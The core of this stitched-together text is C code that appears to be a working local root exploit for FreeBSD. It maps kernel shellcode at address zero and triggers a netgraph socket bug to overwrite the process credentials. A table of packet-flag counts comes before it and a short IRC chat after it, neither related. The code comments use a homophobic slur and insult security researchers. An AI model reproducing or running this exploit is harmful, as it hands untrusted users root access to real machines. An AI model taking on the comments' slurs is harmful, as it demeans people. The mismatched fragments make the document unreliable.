1 flags=A
      2 flags=AFP
    444 flags=R
  12661 flags=RA
    279 flags=RAF
      2 flags=RAP
      1 flags=RAX
      2 flags=RAXY
     38 flags=RAY
      1 flags=RSA
     12 flags=RX
      1 flags=RXY
      2 flags=RY
   3494 flags=SA

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

/* What kind of faggot has bluetooth enabled on his FreeBSD desktop,  */
/* to which there are also untrusted users logged in? A bulnerability */
/* that could only ever be found by a twat of a 'security resaercher' */

char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
                   0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
                   0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
                   0xc3, 0x00 };

int main(int argc, char** argv)
{
  int x;
  int f;
  int u;

  char *args[] = {"/bin/sh", 0};

  f = open("/home/base3/test", O_RDWR);

  mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
  strncpy((char *)0, payload, 26);

  x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
  if (x == -1)
    printf("Fuck.\nAn error, number %d, happened\n", errno);

  shutdown (x, SHUT_RDWR);

  u = (int) geteuid();
  printf ("Your uid is %d\n", u);

  //execve(args[0], args, 0);

  return 0;
}

20:28 -!- Irssi: Starting query in freenode with neo
20:28 <neo> oui?
20:28 <neo> yes ?
20:30 <base3> just a little joke
20:30 <base3> 'wake up neo' get it?
20:30 <neo> yes :)
20:30 <base3> i bet you get that joke all the time
20:31 <base3> :)
20:31 <neo> you got it right